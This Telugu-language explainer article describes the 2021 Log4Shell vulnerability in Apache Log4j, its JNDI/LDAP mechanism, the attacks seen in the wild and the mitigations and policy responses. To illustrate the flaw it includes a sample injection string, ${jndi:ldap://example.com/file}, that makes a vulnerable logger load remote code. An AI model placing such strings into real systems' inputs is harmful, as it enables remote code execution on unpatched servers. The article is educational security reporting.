విషయ సూచిక[దాచు][చూపండి]
నవంబర్ 2021 చివరలో, మేము సైబర్ భద్రతకు పెద్ద ముప్పును కనుగొన్నాము. ఈ దోపిడీ ప్రపంచవ్యాప్తంగా మిలియన్ల కొద్దీ కంప్యూటర్ సిస్టమ్లను ప్రభావితం చేస్తుంది.
ఇది Log4j దుర్బలత్వంపై గైడ్ మరియు ప్రపంచంలోని 90% కంప్యూటర్ సర్వీస్లపై నిర్లక్ష్యం చేయబడిన డిజైన్ లోపం దాడికి దారితీసింది.
Apache Log4j అనేది అపాచీ సాఫ్ట్వేర్ ఫౌండేషన్ ద్వారా అభివృద్ధి చేయబడిన ఓపెన్ సోర్స్ జావా-ఆధారిత లాగింగ్ యుటిలిటీ. వాస్తవానికి 2001లో సెకి గుల్కుచే వ్రాయబడింది, ఇది ఇప్పుడు అపాచీ సాఫ్ట్వేర్ ఫౌండేషన్ యొక్క ప్రాజెక్ట్ అయిన అపాచీ లాగింగ్ సర్వీసెస్లో భాగం.
ప్రపంచవ్యాప్తంగా ఉన్న కంపెనీలు తమ అప్లికేషన్లలో లాగింగ్ని ప్రారంభించడానికి Log4j లైబ్రరీని ఉపయోగిస్తాయి. నిజానికి, జావా లైబ్రరీ సర్వవ్యాప్తి చెందింది, మీరు దీన్ని Amazon, Microsoft, Google మరియు మరిన్నింటి అప్లికేషన్లలో కనుగొనవచ్చు.
లైబ్రరీ యొక్క ప్రాముఖ్యత అంటే కోడ్లోని ఏదైనా సంభావ్య లోపం మిలియన్ల కంప్యూటర్లను హ్యాకింగ్కు తెరిచి ఉంచవచ్చు. నవంబర్ 24, 2021న, ఎ క్లౌడ్ భద్రత అలీబాబా కోసం పనిచేస్తున్న పరిశోధకుడు ఒక భయంకరమైన లోపాన్ని కనుగొన్నాడు.
Log4j దుర్బలత్వం, Log4Shell అని కూడా పిలుస్తారు, ఇది 2013 నుండి గుర్తించబడదు. ఈ దుర్బలత్వం Log4j అమలులో ఉన్న ప్రభావిత సిస్టమ్లలో కోడ్ని అమలు చేయడానికి హానికరమైన నటులను అనుమతించింది. ఇది డిసెంబర్ 9, 2021న బహిరంగంగా బహిర్గతం చేయబడింది
పరిశ్రమ నిపుణులు Log4Shell లోపాన్ని అంటారు ఇటీవలి మెమరీలో అతిపెద్ద దుర్బలత్వం.
దుర్బలత్వం యొక్క ప్రచురణ తర్వాత వారంలో, సైబర్ సెక్యూరిటీ బృందాలు మిలియన్ల కొద్దీ దాడులను గుర్తించాయి. కొంతమంది పరిశోధకులు నిమిషానికి వందకు పైగా దాడుల రేటును కూడా గమనించారు.
ఇది ఎలా పని చేస్తుంది?
Log4Shell ఎందుకు చాలా ప్రమాదకరమైనదో అర్థం చేసుకోవడానికి, దాని సామర్థ్యం ఏమిటో మనం అర్థం చేసుకోవాలి.
Log4Shell దుర్బలత్వం ఏకపక్ష కోడ్ అమలును అనుమతిస్తుంది, అంటే దాడి చేసే వ్యక్తి లక్ష్య మెషీన్లో ఏదైనా కమాండ్ లేదా కోడ్ని అమలు చేయగలడని ప్రాథమికంగా అర్థం.
ఇది దీన్ని ఎలా నెరవేరుస్తుంది?
ముందుగా, JNDI అంటే ఏమిటో మనం అర్థం చేసుకోవాలి.
జావా నేమింగ్ మరియు డైరెక్టరీ ఇంటర్ఫేస్ (JNDI) అనేది జావా ప్రోగ్రామ్లను ఒక పేరు ద్వారా డేటా మరియు వనరులను కనుగొనడానికి మరియు చూసేందుకు అనుమతించే జావా సేవ. ఈ డైరెక్టరీ సేవలు ముఖ్యమైనవి ఎందుకంటే అవి అప్లికేషన్లను సృష్టించేటప్పుడు డెవలపర్లకు సులభంగా సూచించడానికి వ్యవస్థీకృత రికార్డుల సెట్ను అందిస్తాయి.
JNDI నిర్దిష్ట డైరెక్టరీని యాక్సెస్ చేయడానికి వివిధ ప్రోటోకాల్లను ఉపయోగించవచ్చు. ఈ ప్రోటోకాల్లలో ఒకటి లైట్వెయిట్ డైరెక్టరీ యాక్సెస్ ప్రోటోకాల్ లేదా LDAP.
స్ట్రింగ్ను లాగింగ్ చేస్తున్నప్పుడు, లాగ్4j ఫారమ్ యొక్క వ్యక్తీకరణలను ఎదుర్కొన్నప్పుడు స్ట్రింగ్ ప్రత్యామ్నాయాలను నిర్వహిస్తుంది ${prefix:name}
.
ఉదాహరణకి, Text: ${java:version}
టెక్స్ట్గా లాగిన్ అయి ఉండవచ్చు: జావా వెర్షన్ 1.8.0_65. ఈ విధమైన ప్రత్యామ్నాయాలు సర్వసాధారణం.
వంటి వ్యక్తీకరణలను కూడా మనం కలిగి ఉండవచ్చు Text: ${jndi:ldap://example.com/file}
ఇది LDAP ప్రోటోకాల్ ద్వారా URL నుండి జావా ఆబ్జెక్ట్ను లోడ్ చేయడానికి JNDI సిస్టమ్ను ఉపయోగిస్తుంది.
ఇది మెషీన్లోకి ఆ URL నుండి వచ్చే డేటాను సమర్థవంతంగా లోడ్ చేస్తుంది. ఏదైనా సంభావ్య హ్యాకర్ పబ్లిక్ URLలో హానికరమైన కోడ్ని హోస్ట్ చేయవచ్చు మరియు Log4jని ఉపయోగించే మెషీన్లు లాగ్ చేయడానికి వేచి ఉండండి.
లాగ్ సందేశాల కంటెంట్లు వినియోగదారు-నియంత్రిత డేటాను కలిగి ఉన్నందున, హ్యాకర్లు తమ స్వంత JNDI సూచనలను చొప్పించగలరు, అది వారు నియంత్రించే LDAP సర్వర్లను సూచిస్తుంది. ఈ LDAP సర్వర్లు హానికరమైన జావా వస్తువులతో నిండి ఉండవచ్చు, వీటిని JNDI దుర్బలత్వం ద్వారా అమలు చేయగలదు.
దీన్ని మరింత దిగజార్చేది ఏమిటంటే, అప్లికేషన్ సర్వర్ వైపు లేదా క్లయింట్ వైపు అప్లికేషన్ అయినా పట్టింపు లేదు.
దాడి చేసే వ్యక్తి యొక్క హానికరమైన కోడ్ని చదవడానికి లాగర్కు మార్గం ఉన్నంత వరకు, అప్లికేషన్ దోపిడీలకు తెరవబడి ఉంటుంది.
ఎవరు ప్రభావితమవుతారు?
దుర్బలత్వం APache Log4jని ఉపయోగించే అన్ని సిస్టమ్లు మరియు సేవలను ప్రభావితం చేస్తుంది, 2.0తో సహా సంస్కరణలు 2.14.1.
జావాను ఉపయోగించే అనేక అప్లికేషన్లపై ఈ దుర్బలత్వం ప్రభావం చూపుతుందని పలువురు భద్రతా నిపుణులు సలహా ఇస్తున్నారు.
మైక్రోసాఫ్ట్ యాజమాన్యంలోని Minecraft వీడియో గేమ్లో ఈ లోపం మొదట కనుగొనబడింది. మైక్రోసాఫ్ట్ తమ జావా ఎడిషన్ మైన్క్రాఫ్ట్ సాఫ్ట్వేర్ను అప్గ్రేడ్ చేయమని వారి వినియోగదారులను కోరింది.
సైబర్ సెక్యూరిటీ అండ్ ఇన్ఫ్రాస్ట్రక్చర్ సెక్యూరిటీ ఏజెన్సీ (CISA) డైరెక్టర్ జెన్ ఈస్టర్లీ మాట్లాడుతూ విక్రేతలు ప్రధాన బాధ్యత ఈ దుర్బలత్వాన్ని ఉపయోగించుకునే హానికరమైన నటుల నుండి తుది వినియోగదారులను నిరోధించడానికి.
"తమ ఉత్పత్తి ఈ దుర్బలత్వాన్ని కలిగి ఉందని మరియు సాఫ్ట్వేర్ అప్డేట్లకు ప్రాధాన్యతనివ్వాలని తుది-వినియోగదారులు తెలుసుకునేలా విక్రేతలు తమ కస్టమర్లతో కమ్యూనికేట్ చేయాలి."
ఇప్పటికే దాడులు ప్రారంభమైనట్లు సమాచారం. సైబర్ సెక్యూరిటీ సాఫ్ట్వేర్ను అందించే సంస్థ సిమాంటెక్, అనేక రకాల దాడి అభ్యర్థనలను గమనించింది.
పరిశోధకులు గుర్తించిన దాడుల రకాలకు సంబంధించిన కొన్ని ఉదాహరణలు ఇక్కడ ఉన్నాయి:
- botnets
బాట్నెట్లు అనేది ఒకే దాడి చేసే పార్టీ నియంత్రణలో ఉండే కంప్యూటర్ల నెట్వర్క్. వారు DDoS దాడులు, డేటాను దొంగిలించడం మరియు ఇతర స్కామ్లు చేయడంలో సహాయపడతారు. Log4j ఎక్స్ప్లోయిట్ నుండి డౌన్లోడ్ చేయబడిన షెల్ స్క్రిప్ట్లలో Muhstik బోట్నెట్ను పరిశోధకులు గమనించారు.
- XMRig మైనర్ ట్రోజన్
XMRig అనేది ఓపెన్ సోర్స్ క్రిప్టోకరెన్సీ మైనర్, ఇది Monero టోకెన్ను గని చేయడానికి CPUలను ఉపయోగిస్తుంది. సైబర్ నేరగాళ్లు వ్యక్తుల పరికరాలలో XMRigని ఇన్స్టాల్ చేయగలరు, తద్వారా వారికి తెలియకుండానే వారి ప్రాసెసింగ్ శక్తిని ఉపయోగించుకోవచ్చు.
- ఖోంసారి రాన్సమ్వేర్
Ransomware అనేది రూపొందించబడిన మాల్వేర్ రూపాన్ని సూచిస్తుంది ఫైళ్లను గుప్తీకరించండి కంప్యూటర్లో. దాడి చేసేవారు ఎన్క్రిప్ట్ చేసిన ఫైల్లకు తిరిగి యాక్సెస్ ఇవ్వడం కోసం చెల్లింపును డిమాండ్ చేయవచ్చు. Log4Shell దాడుల్లో ఖోన్సారి ransomwareని పరిశోధకులు కనుగొన్నారు. వారు Windows సర్వర్లను లక్ష్యంగా చేసుకుంటారు మరియు .NET ఫ్రేమ్వర్క్ను ఉపయోగించుకుంటారు.
తర్వాత ఏమి జరుగును?
Log4J దుర్బలత్వం వల్ల ఏర్పడిన గందరగోళాన్ని పూర్తిగా పరిష్కరించడానికి నెలలు లేదా బహుశా సంవత్సరాలు పట్టవచ్చని నిపుణులు అంచనా వేస్తున్నారు.
ఈ ప్రక్రియలో ప్రతి ప్రభావిత సిస్టమ్ను ప్యాచ్డ్ వెర్షన్తో అప్డేట్ చేయడం ఉంటుంది. ఈ అన్ని సిస్టమ్లు ప్యాచ్ చేయబడినప్పటికీ, దాడి కోసం సర్వర్లు తెరవబడిన విండోకు హ్యాకర్లు ఇప్పటికే జోడించిన బ్యాక్డోర్ల ముప్పు ఇంకా ఉంది.
అనేక పరిష్కారాలు మరియు ఉపశమనాలు ఈ బగ్ ద్వారా అప్లికేషన్లు ఉపయోగించబడకుండా నిరోధించడానికి ఉన్నాయి. కొత్త Log4j వెర్షన్ 2.15.0-rc1 ఈ దుర్బలత్వాన్ని తగ్గించడానికి వివిధ సెట్టింగ్లను మార్చింది.
JNDIని ఉపయోగించే అన్ని ఫీచర్లు డిఫాల్ట్గా నిలిపివేయబడతాయి మరియు రిమోట్ శోధనలు కూడా పరిమితం చేయబడ్డాయి. మీ Log4j సెటప్లో లుక్అప్ ఫీచర్ను నిలిపివేయడం వలన సాధ్యమయ్యే దోపిడీల ప్రమాదాన్ని తగ్గించడంలో సహాయపడుతుంది.
Log4j వెలుపల, ఓపెన్ సోర్స్ దోపిడీలను నిరోధించడానికి ఇంకా విస్తృత ప్రణాళిక అవసరం.
మే నెలలో, వైట్ హౌస్ ఒక విడుదల చేసింది ఎగ్జిక్యూటివ్ ఆర్డర్ ఇది జాతీయ సైబర్ భద్రతను మెరుగుపరచడం లక్ష్యంగా పెట్టుకుంది. ఇది సాఫ్ట్వేర్ బిల్ ఆఫ్ మెటీరియల్స్ (SBOM) కోసం ఒక నిబంధనను కలిగి ఉంది, ఇది తప్పనిసరిగా అప్లికేషన్ను రూపొందించడానికి అవసరమైన ప్రతి వస్తువు యొక్క జాబితాను కలిగి ఉన్న అధికారిక పత్రం.
వంటి భాగాలు ఇందులో ఉన్నాయి ఓపెన్ సోర్స్ అభివృద్ధి కోసం ఉపయోగించే ప్యాకేజీలు, డిపెండెన్సీలు మరియు APIలు. SBOMల ఆలోచన పారదర్శకతకు ఉపకరించినప్పటికీ, అది వినియోగదారునికి నిజంగా సహాయపడుతుందా?
డిపెండెన్సీలను అప్గ్రేడ్ చేయడం చాలా ఇబ్బందిగా ఉండవచ్చు. ప్రత్యామ్నాయ ప్యాకేజీలను కనుగొనడంలో అదనపు సమయాన్ని వృధా చేసే ప్రమాదం కంటే కంపెనీలు ఏదైనా జరిమానాలు చెల్లించడాన్ని ఎంచుకోవచ్చు. బహుశా ఈ SBOMలు వారికి మాత్రమే ఉపయోగపడతాయి పరిధిని మరింత పరిమితం చేయబడింది.
ముగింపు
Log4j సమస్య సంస్థలకు కేవలం సాంకేతిక సమస్య కంటే ఎక్కువ.
వ్యాపార నాయకులు తమ సర్వర్లు, ఉత్పత్తులు లేదా సేవలు తాము నిర్వహించని కోడ్పై ఆధారపడినప్పుడు సంభవించే సంభావ్య ప్రమాదాల గురించి తప్పనిసరిగా తెలుసుకోవాలి.
ఓపెన్ సోర్స్ మరియు థర్డ్ పార్టీ అప్లికేషన్లపై ఆధారపడటం వలన ఎల్లప్పుడూ కొంత ప్రమాదం ఉంటుంది. కొత్త బెదిరింపులు వెలుగులోకి రాకముందే కంపెనీలు నష్ట నివారణ వ్యూహాలను రూపొందించడాన్ని పరిగణించాలి.
వెబ్లో ఎక్కువ భాగం ప్రపంచవ్యాప్తంగా వేలాది మంది వాలంటీర్లచే నిర్వహించబడే ఓపెన్ సోర్స్ సాఫ్ట్వేర్పై ఆధారపడుతుంది.
మేము వెబ్ను సురక్షితమైన ప్రదేశంగా ఉంచాలనుకుంటే, ప్రభుత్వాలు మరియు కార్పొరేషన్లు ఓపెన్ సోర్స్ ప్రయత్నాలకు మరియు సైబర్ సెక్యూరిటీ ఏజెన్సీలకు నిధులు సమకూర్చడంలో పెట్టుబడి పెట్టాలి CISA.
సమాధానం ఇవ్వూ